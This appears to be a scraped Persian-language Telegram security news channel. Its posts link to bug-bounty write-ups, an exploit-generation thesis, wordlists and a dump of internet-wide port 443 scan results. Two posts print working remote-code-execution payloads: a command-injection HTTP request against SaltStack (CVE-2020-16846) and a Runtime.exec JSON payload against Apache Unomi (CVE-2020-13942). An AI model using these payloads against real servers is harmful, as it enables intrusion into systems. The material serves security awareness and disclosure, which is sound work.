امنیت اطلاعات
850 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
اکسپلویت آسیب پذیری saltstack

CVE-2020-16846


PoC:

POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator


#rce
#saltstack


@sec_nerd
رایت آپ کشف باگ ssrf به ارزش ۳۱ هزار دلار در سرویس مانیتورینگ ابر گوگل


https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html


#bugbounty
#google
#ssrf


@sec_nerd
رایت آپ کشف باگ در مسنجر فیسبوک که منجر به لو دادن اکسس توکن های میلیونها کاربر میشود

https://medium.com/@guhanraja/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3



#bugbounty
#writeup
#facebook


@sec_nerd
ترکیب سه آسیب پذیری برای تصاحب اکانت

SSRF-->Cloudflare bypass--> Rate limiting to account takeover.


https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304


#writeup
#ssrf



@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
باگ RCE در Apache Unomi

CVE-2020-13942


PoC:
{"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}


#apache
#rce

@sec_nerd
یک منبع مناسب برای تهیه wordlist با هدفهای متنوع

https://wordlists.assetnote.io/


#wordlist
#fuzz
#pentest


@sec_nerd
یک رساله دکترا در خصوص تولید اکسپلویت

Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters

https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf


توضیحات مختصر

https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/


#overflow
#exploit


@sec_nerd
استفاده غیرامن از تابع unserialize در فریمورک zend منجر به RCE میشود

https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38

#php
#poi
#rce

@sec_nerd
رتبه بندی ده زبان برتر برنامه نویسی که توسعه دهندگان علاقه بیشتری به آنها داشته اند در سال ۲۰۲۰

1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript

https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved

#dev


@sec_nerd
نتایج اسکن کل اینترنت برای پورت ۴۴۳ که توسط یک فرد نیکوکار انجام شده

https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs


#scan
#enum


@sec_nerd